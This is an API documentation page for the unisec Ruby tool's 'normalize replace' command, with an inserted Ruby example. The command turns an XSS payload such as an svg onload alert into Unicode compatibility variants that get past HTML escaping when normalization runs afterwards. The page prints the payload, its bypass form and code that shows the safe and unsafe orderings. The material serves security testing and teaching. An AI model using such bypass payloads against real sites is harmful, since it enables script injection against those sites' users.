Class: Unisec::CLI::Commands::Normalize::Replace

Inherits:
Dry::CLI::Command
  • Object
Defined in:
lib/unisec/cli/normalization.rb

Overview

Command unisec normalize replace "example"

Example:

➜ unisec normalize replace "<svg onload=\"alert('XSS')\">"
Original: <svg onload="alert('XSS')">
  U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E
Bypass payload: ﹤svg onload="alert('XSS')"﹥
  U+FE64 U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+FF02 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+FF07 U+0058 U+0053 U+0053 U+FF07 U+0029 U+FF02 U+FE65
NFKC: <svg onload="alert('XSS')">
  U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E
NFKD: <svg onload="alert('XSS')">
  U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E

➜ echo -n "<svg onload=\"alert('XSS')\">" | unisec normalize replace -
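The Overview shows why the replaced payload matters: the compatibility variants survive an HTML escaper and only fold back into ASCII metacharacters when the application normalizes afterwards. As an added example that is not part of unisec, the Ruby below reproduces that ordering problem beside the safe ordering (normalize, then escape) and adds a pre-check a validator can run; the constant and helper names are my own, and the payload is rebuilt from the code points listed above.

```ruby
require 'cgi'

# Constructed sample (assumption): the bypass payload from the Overview,
# rebuilt from its code points. U+FE64/U+FE65 are SMALL LESS-THAN/GREATER-THAN
# SIGN, U+FF02 is FULLWIDTH QUOTATION MARK, U+FF07 is FULLWIDTH APOSTROPHE.
BYPASS_PAYLOAD = "\uFE64svg onload=\uFF02alert(\uFF07XSS\uFF07)\uFF02\uFE65".freeze

# ASCII HTML metacharacters present in a string, in order of first appearance.
def html_metachars(str)
  str.scan(/[<>"']/).uniq
end

# Vulnerable ordering: escape first, normalize afterwards. CGI.escapeHTML only
# rewrites ASCII & < > " ', so the compatibility variants pass through
# untouched and NFKC/NFKD then folds them into the ASCII metacharacters.
def escape_then_normalize(str, form = :nfkc)
  CGI.escapeHTML(str).unicode_normalize(form)
end

# Defensive ordering: normalize first, then escape. The folded ASCII
# metacharacters are now visible to the escaper and become entities.
def normalize_then_escape(str, form = :nfkc)
  CGI.escapeHTML(str.unicode_normalize(form))
end

# Pre-check for input validation: true when normalizing would introduce an
# HTML metacharacter that the raw input did not contain.
def normalization_introduces_metachars?(str, form = :nfkc)
  !(html_metachars(str.unicode_normalize(form)) - html_metachars(str)).empty?
end

if __FILE__ == $PROGRAM_NAME
  %i[nfkc nfkd].each do |form|
    puts "#{form} escape-then-normalize: #{escape_then_normalize(BYPASS_PAYLOAD, form)}"
    puts "#{form} normalize-then-escape: #{normalize_then_escape(BYPASS_PAYLOAD, form)}"
  end
  puts "flagged by pre-check: #{normalization_introduces_metachars?(BYPASS_PAYLOAD)}"
end
```

The same test applies to any other escaper in the stack (JSON, attribute or URL encoders): whatever runs before normalization cannot see what normalization will produce.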

Instance Method Summary

Instance Method Details

#call(input: nil, **_options) ⇒ Object

Prepare an XSS payload for HTML escape bypass (HTML escape followed by NFKC / NFKD normalization)

Parameters:

  • input (String) (defaults to: nil)

    Input string to normalize



# File 'lib/unisec/cli/normalization.rb', line 79

def call(input: nil, **_options)
  # A lone "-" argument means: read the payload from standard input instead
  input = $stdin.read.chomp if input == '-'
  puts Unisec::Normalization.new(input).display_replace
end